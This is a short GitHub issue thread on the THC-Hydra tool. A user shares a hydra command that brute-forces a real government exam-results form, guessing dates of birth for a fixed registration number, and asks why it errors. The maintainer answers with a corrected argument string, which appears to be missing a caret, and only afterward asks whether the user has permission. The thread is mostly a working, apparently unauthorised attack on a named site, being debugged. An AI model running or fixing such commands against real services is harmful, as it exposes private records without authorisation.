### ISSUE TITLE
 the variables argument needs at least the strings ^USER^ or ^PASS^: B1=Submit

### ISSUE THREAD

**Issue by ertanuj96** [vanhauser-thc/thc-hydra#363]
this is my command which I am using against variables "regno" & "dob" in a online result providing webform

hydra -l 513802837 -P /root/Desktop/cbse.txt -vV -s 80 http://cbseresults.nic.in http-get-form "/neet18qry/neetJ18.htm&regno=^USER^&dob=^PASS^:B1=Submit:Invalid regno."
 what is wrong with this command , why hydra again and again raising same error? 
please help me if anyone can , how to solve this issue.

**Comment by vanhauser-thc** [comment]
wrong setup of the arguments. 

"/neet18qry/neetJ18.htm:regno=^USER^&dob=^PASS&B1=Submit:Invalid regno."

also I hope you have permission to test this web service?
